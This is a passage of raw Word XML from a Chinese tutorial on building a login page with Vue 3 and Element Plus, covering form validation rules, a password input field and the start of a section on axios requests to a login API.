          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4561C0C3" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            min: 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522CD47A" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            max: 5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE02BC8" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>用户名长度必须是</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>个字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFC5ADE" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            trigger: 'blur'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236CDDE" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B84819B" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D0DD9" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    password: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B8FEF2" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B195DD6" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            required: true, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07319F01" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请输入密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ADAF0D" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            trigger: 'blur' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4321365A" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2EF01C" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            min: 3, max: 5, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE6512" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            message: '</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>长度在</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>个字符</w:t>
      </w:r>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263849F8" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            trigger: 'blur' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587A6E2F" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE1D8AA" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5241D88F" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431DC7E1" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174A2428" w14:textId="128A2E2A" w:rsidR="00C94676" w:rsidRPr="00C94676" w:rsidRDefault="00C94676" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C94676">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94676">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94676">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>表单参数自行回调校验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6889EC16" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const formRef = ref(null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E32F0AC" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5347A072" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>const onSubmit = () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE30476" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    formRef.value.validate((valid) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092F14E9" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (valid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41F3CD" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            console.log('submit!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7332F269" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A9890" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            console.log('error submit!!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B8DE0" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">            return false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4EA1BD" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159FC7EC" w14:textId="77777777" w:rsidR="00716278" w:rsidRPr="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC570AB" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00716278">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8011FD" w14:textId="77777777" w:rsidR="00716278" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="483EB812" w14:textId="6E3EBD6C" w:rsidR="003D73B1" w:rsidRDefault="00716278" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292874F0" w14:textId="77777777" w:rsidR="003D73B1" w:rsidRDefault="003D73B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101AF255" w14:textId="27242542" w:rsidR="003D73B1" w:rsidRDefault="00A70351" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置输入框为密码类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7225F36D" w14:textId="3DDDB408" w:rsidR="00A70351" w:rsidRDefault="00A70351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>type="password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以输入文字的时候，都使用圆形替代</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F55FFD7" w14:textId="282B3D6A" w:rsidR="00A70351" w:rsidRDefault="00A70351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">show-password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性，可以输入密码的时候，点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>眼睛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看密码的</w:t>
      </w:r>
      <w:r w:rsidR="008C2AB3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4BB3B0" w14:textId="46DA0EF4" w:rsidR="00A70351" w:rsidRDefault="00A70351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A70351">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;el-input v-model="form.password" placeholder="</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70351">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请输入密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70351">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>" type="password" :prefix-icon="Lock" show-password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1B139D" w14:textId="77777777" w:rsidR="00A70351" w:rsidRPr="00A70351" w:rsidRDefault="00A70351" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECAF0D2" w14:textId="1A0A3365" w:rsidR="00AE5B29" w:rsidRDefault="00AE5B29" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="693" w:name="_Toc159780123"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求库和登录接口交互</w:t>
      </w:r>
      <w:bookmarkEnd w:id="693"/>
    </w:p>
    <w:p w14:paraId="1EFB9102" w14:textId="77777777" w:rsidR="00AE5B29" w:rsidRDefault="00AE5B29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1801C37D" w14:textId="668FF711" w:rsidR="00BE1417" w:rsidRDefault="00BE1417" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口文档：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B39C03A" w14:textId="7370F93F" w:rsidR="00AE5B29" w:rsidRDefault="00BE1417" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE1417">
        <w:t>http://dishaxy.dishait.cn/shopadminapi/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635AEF12" w14:textId="77777777" w:rsidR="00AE5B29" w:rsidRPr="00AE5B29" w:rsidRDefault="00AE5B29" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CF63DE" w14:textId="7F75B901" w:rsidR="003D73B1" w:rsidRDefault="00BE1417" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该接口基本都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据传输</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E16ED2" w14:textId="77777777" w:rsidR="00BE1417" w:rsidRDefault="00BE1417" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2CA027" w14:textId="41AECEC9" w:rsidR="00BE1417" w:rsidRPr="006E5D70" w:rsidRDefault="00BE1417" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>涉及到请求，就使用到</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">axios </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。关于</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中下文创建的</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ogin().then().catch()</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>语法结构，如何让代码进入</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> then</w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="006E5D70" w:rsidRPr="006E5D70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
